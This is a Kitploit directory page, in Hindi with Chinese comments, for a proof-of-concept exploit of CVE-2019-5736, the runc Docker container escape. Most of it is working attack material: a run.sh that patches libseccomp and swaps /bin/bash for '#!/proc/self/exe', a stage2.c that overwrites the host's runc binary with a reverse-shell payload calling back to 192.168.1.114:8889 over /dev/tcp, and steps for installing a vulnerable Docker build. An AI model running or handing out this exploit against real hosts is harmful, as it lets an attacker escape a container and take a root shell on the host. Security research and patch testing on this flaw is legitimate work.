Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-5736 — CVE-2019-5736 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो runc बाइनरी ओवरराइट के माध्यम से Docker कंटेनर से बच निकलने की अनुमति देता है, तथा libseccomp हेरफेर के माध्यम से होस्ट शेल तक पहुंच को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/si1ent-le/cve-2019-5736
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणरेड टीमिंगकंटेनर एस्केपबाइनरी शोषण
GitHubsi1ent-le/cve-2019-5736

CVE-2019-5736

CVE-2019-5736 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो runc बाइनरी ओवरराइट के माध्यम से Docker कंटेनर से बच निकलने की अनुमति देता है, तथा libseccomp हेरफेर के माध्यम से होस्ट शेल तक पहुंच को सक्षम बनाता है।

रिपॉजिटरी देखें
44 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-5736

संदर्भ: cve-2019-5736-poc

  • (1). stage2.cve में poc कमांड संपादित करें
  • (2). डॉकर इमेज बनाएं docker build -t cve .
  • (3). डॉकर चलाएं docker run -d cve /bin/bash -c "tail -f /dev/null"
  • (4). docker-runc का बैकअप लें cp /usr/bin/docker-runc /usr/bin/docker-runc.bak
  • (5). docker exec -it docker-id /bin/bash
  • (6). run.sh में libseccomp संस्करण संपादित करें Exp:cd /root/libseccomp-2.5.1
  • (7). डॉकर के अंदर चलाएं cd /root && ./run.sh && exit
  • (8). docker exec -it docker-id /bin/bash

संशोधित भाग

run.sh

root@kitploit:~
#!/bin/bash
# libseccomp version should be carefully checked based on the version downloaded in /root directory after container creation
cd /root/libseccomp-2.5.1
cat /root/stage1.c >> src/api.c
DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -b -uc -us
dpkg -i /root/*.deb
mv /bin/bash /bin/good_bash
gcc /root/stage2.c -o /stage2
cat >/bin/bash <<EOF
#!/proc/self/exe
EOF
chmod +x /bin/bash

व्यावहारिक कार्यान्वयन

पर्यावरण

root@kitploit:~
होस्ट मशीन: Ubuntu18.04
Docker-ce: 18.06.1~ce~3-0~ubuntu
docker-runc: 1.0

पर्यावरण तैनाती

root@kitploit:~
sudo apt-get update
sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1~ce~3-0~ubuntu
# 如出错,cd /var/lib/dpkg/updates删除目录下的所有文件再执行以上
root@root:~# sudo apt-get install docker-ce=18.06.1~ce~3-0~ubuntu

C फ़ाइल संशोधित करें

stage2.c

root@kitploit:~
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>

int main(int argc, char **argv) {

    printf("HAX2: argv: %s\n", argv[1]);
    int res1 = -1;
    int total = 10000;
    while(total>0 && res1== -1){

        int fd = open(argv[1], O_RDWR|O_TRUNC);
        printf("HAX2: fd: %d\n", fd);

        const char *poc = "#!/bin/bash\n/bin/bash -i >& /dev/tcp/192.168.1.114/8889 0>&1  &\n";
        int res = write(fd, poc, strlen(poc));
        printf("HAX2: res: %d, %d\n", res, errno);
        res1 = res;
        total--;
    }
}

इमेज बनाएं

root@kitploit:~
docker build -t cve-2019-5736 .

image

चलाएं

root@kitploit:~
docker run -d cve-2019-5736 /bin/bash -c "tail -f /dev/null"

image

होस्ट मशीन का docker-runc बैकअप लें

बाद में सिस्टम के docker-runc फ़ाइल को ओवरराइट करने के लिए

root@kitploit:~
cp /usr/bin/docker-runc /usr/bin/docker-runc.bak

कंटेनर में लॉगिन करें

root@kitploit:~
docker exec -it 655378598a92 /bin/bash

कंटेनर के अंदर निष्पादित करें

root@kitploit:~
# 备注:及时修改run.sh文件中libseccomp版本信息再执行
cd /root 
./run.sh
exit

कंटेनर से पुनः कनेक्ट करें

root@kitploit:~
# docker exec -it 655378598a92 /bin/bash
# 此时nc监听会收到一个反弹宿主机的shell

image

टूल डाउनलोड करें